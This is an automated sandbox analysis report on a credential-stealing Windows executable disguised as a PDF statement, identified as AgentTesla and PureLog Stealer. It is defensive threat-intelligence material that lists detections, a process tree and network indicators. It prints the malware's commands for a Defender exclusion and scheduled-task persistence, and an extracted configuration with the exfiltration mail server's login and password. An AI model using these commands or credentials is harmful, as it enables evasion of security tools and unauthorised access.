Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SOA FOR APR 2024 PDF.exe

Overview

General Information

Sample name:SOA FOR APR 2024 PDF.exe
Analysis ID:1432007
MD5:7a6e9d01d9162c7537ba8091187e4235
SHA1:f5b69f4b0ec8cd0a4b7bab26a0de167c8cc535cd
SHA256:7fd14673f73717b024728ae4248be0a1579f480a261c4f4d94742f230a01cb47
Tags:exe
Infos:

Detection

AgentTesla, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SOA FOR APR 2024 PDF.exe (PID: 1988 cmdline: "C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe" MD5: 7A6E9D01D9162C7537BA8091187E4235)
    • powershell.exe (PID: 4296 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3992 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eeBIYZL.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7580 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7200 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmpCB26.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • SOA FOR APR 2024 PDF.exe (PID: 7384 cmdline: "C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe" MD5: 7A6E9D01D9162C7537BA8091187E4235)
  • eeBIYZL.exe (PID: 7512 cmdline: C:\Users\user\AppData\Roaming\eeBIYZL.exe MD5: 7A6E9D01D9162C7537BA8091187E4235)
    • schtasks.exe (PID: 7736 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmpE2E4.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • eeBIYZL.exe (PID: 7788 cmdline: "C:\Users\user\AppData\Roaming\eeBIYZL.exe" MD5: 7A6E9D01D9162C7537BA8091187E4235)
  • BjTxJte.exe (PID: 7928 cmdline: "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe" MD5: 7A6E9D01D9162C7537BA8091187E4235)
    • schtasks.exe (PID: 8132 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmp9B5.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • BjTxJte.exe (PID: 7216 cmdline: "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe" MD5: 7A6E9D01D9162C7537BA8091187E4235)
    • BjTxJte.exe (PID: 7176 cmdline: "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe" MD5: 7A6E9D01D9162C7537BA8091187E4235)
  • BjTxJte.exe (PID: 7240 cmdline: "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe" MD5: 7A6E9D01D9162C7537BA8091187E4235)
    • schtasks.exe (PID: 7568 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmp2ADA.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • BjTxJte.exe (PID: 7364 cmdline: "C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe" MD5: 7A6E9D01D9162C7537BA8091187E4235)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.fascia-arch.com", "Username": "brian@fascia-arch.com", "Password": "HERbertstown1987"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.3282089409.000000000288C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000000.00000002.2071533656.0000000003B69000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      00000015.00000002.2316615219.00000000045FC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000015.00000002.2316615219.00000000045FC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000009.00000002.3273741870.0000000000435000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 43 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.SOA FOR APR 2024 PDF.exe.3b69970.6.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              0.2.SOA FOR APR 2024 PDF.exe.48f62c8.7.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.SOA FOR APR 2024 PDF.exe.48f62c8.7.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.2.SOA FOR APR 2024 PDF.exe.48f62c8.7.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x31cfe:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x31d70:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x31dfa:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x31e8c:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x31ef6:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x31f68:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x31ffe:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x3208e:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  0.2.SOA FOR APR 2024 PDF.exe.3b69970.6.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    Click to see the 47 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe", ParentImage: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe, ParentProcessId: 1988, ParentProcessName: SOA FOR APR 2024 PDF.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe", ProcessId: 4296, ProcessName: powershell.exe
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe, ProcessId: 7384, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BjTxJte
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe", ParentImage: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe, ParentProcessId: 1988, ParentProcessName: SOA FOR APR 2024 PDF.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe", ProcessId: 4296, ProcessName: powershell.exe
                    Sigma detected: Suspicious Add Scheduled Task Parent
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmpE2E4.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmpE2E4.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\eeBIYZL.exe, ParentImage: C:\Users\user\AppData\Roaming\eeBIYZL.exe, ParentProcessId: 7512, ParentProcessName: eeBIYZL.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmpE2E4.tmp", ProcessId: 7736, ProcessName: schtasks.exe
                    Sigma detected: Suspicious Outbound SMTP Connections
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 50.87.195.61, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe, Initiated: true, ProcessId: 7384, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49711
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmpCB26.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmpCB26.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe", ParentImage: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe, ParentProcessId: 1988, ParentProcessName: SOA FOR APR 2024 PDF.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmpCB26.tmp", ProcessId: 7200, ProcessName: schtasks.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe", ParentImage: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe, ParentProcessId: 1988, ParentProcessName: SOA FOR APR 2024 PDF.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe", ProcessId: 4296, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Scheduled temp file as task from temp location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmpCB26.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmpCB26.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe", ParentImage: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe, ParentProcessId: 1988, ParentProcessName: SOA FOR APR 2024 PDF.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmpCB26.tmp", ProcessId: 7200, ProcessName: schtasks.exe

                    Snort Signatures

                    No Snort rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 21.2.BjTxJte.exe.45fc310.7.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.fascia-arch.com", "Username": "brian@fascia-arch.com", "Password": "HERbertstown1987"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeReversingLabs: Detection: 44%
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeVirustotal: Detection: 52%Perma Link
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeReversingLabs: Detection: 44%
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeVirustotal: Detection: 52%Perma Link
                    Multi AV Scanner detection for submitted file
                    Source: SOA FOR APR 2024 PDF.exeReversingLabs: Detection: 44%
                    Source: SOA FOR APR 2024 PDF.exeVirustotal: Detection: 52%Perma Link
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: SOA FOR APR 2024 PDF.exeJoe Sandbox ML: detected
                    Source: SOA FOR APR 2024 PDF.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49708 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49712 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49721 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49723 version: TLS 1.2
                    Source: SOA FOR APR 2024 PDF.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeCode function: 4x nop then jmp 0D3B12B4h0_2_0D3B0CC4
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeCode function: 4x nop then jmp 08720CACh10_2_087206BC
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 4x nop then jmp 0D8B0CACh15_2_0D8B06BC
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 4x nop then jmp 0D1A0CACh21_2_0D1A06BC
                    Source: global trafficTCP traffic: 192.168.2.5:49711 -> 50.87.195.61:587
                    Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                    Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: global trafficTCP traffic: 192.168.2.5:49711 -> 50.87.195.61:587
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                    Source: global trafficDNS traffic detected: DNS query: mail.fascia-arch.com
                    Source: SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.000000000288C000.00000004.00000800.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.000000000296A000.00000004.00000800.00020000.00000000.sdmp, eeBIYZL.exe, 0000000E.00000002.3282284281.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3285357778.000000000351E000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3285357778.00000000034FC000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3285357778.00000000035C4000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000018.00000002.3283970574.000000000323C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.fascia-arch.com
                    Source: SOA FOR APR 2024 PDF.exe, 00000009.00000002.3326899826.0000000006497000.00000004.00000020.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3275075106.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3358769112.0000000008990000.00000004.00000020.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.000000000296A000.00000004.00000800.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.0000000002894000.00000004.00000800.00020000.00000000.sdmp, eeBIYZL.exe, 0000000E.00000002.3275604629.0000000000F76000.00000004.00000020.00020000.00000000.sdmp, eeBIYZL.exe, 0000000E.00000002.3282284281.0000000002EB4000.00000004.00000800.00020000.00000000.sdmp, eeBIYZL.exe, 0000000E.00000002.3275604629.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3276901832.00000000016BD000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3326328315.0000000006A5C000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3285357778.000000000351E000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3326328315.0000000006AA9000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3285357778.0000000003504000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3285357778.00000000035C4000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3276901832.00000000016CF000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000018.00000002.3278778403.0000000001751000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000018.00000002.3278778403.0000000001713000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000018.00000002.3283970574.0000000003244000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/0
                    Source: SOA FOR APR 2024 PDF.exe, 00000009.00000002.3326899826.0000000006497000.00000004.00000020.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3275075106.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3358769112.0000000008990000.00000004.00000020.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.000000000296A000.00000004.00000800.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.0000000002894000.00000004.00000800.00020000.00000000.sdmp, eeBIYZL.exe, 0000000E.00000002.3275604629.0000000000F76000.00000004.00000020.00020000.00000000.sdmp, eeBIYZL.exe, 0000000E.00000002.3282284281.0000000002EB4000.00000004.00000800.00020000.00000000.sdmp, eeBIYZL.exe, 0000000E.00000002.3275604629.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3276901832.00000000016BD000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3326328315.0000000006A5C000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3285357778.000000000351E000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3326328315.0000000006AA9000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3285357778.0000000003504000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3285357778.00000000035C4000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3276901832.00000000016CF000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000018.00000002.3278778403.0000000001751000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000018.00000002.3278778403.0000000001713000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000018.00000002.3283970574.0000000003244000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r3.o.lencr.org0
                    Source: SOA FOR APR 2024 PDF.exe, 00000000.00000002.2070759087.0000000002DEF000.00000004.00000800.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000000.00000002.2070759087.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, SOA FOR APR 2024 PDF.exe, 00000009.00000002.3282089409.0000000002811000.00000004.00000800.00020000.00000000.sdmp, eeBIYZL.exe, 0000000A.00000002.2129650041.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, eeBIYZL.exe, 0000000E.00000002.3282284281.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000000F.00000002.2226704866.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000000F.00000002.2226704866.000000000311F000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.3285357778.000000000348C000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000015.00000002.2310538046.0000000002919000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000015.00000002.2310538046.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000018.00000002.3283970574.00000000031C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
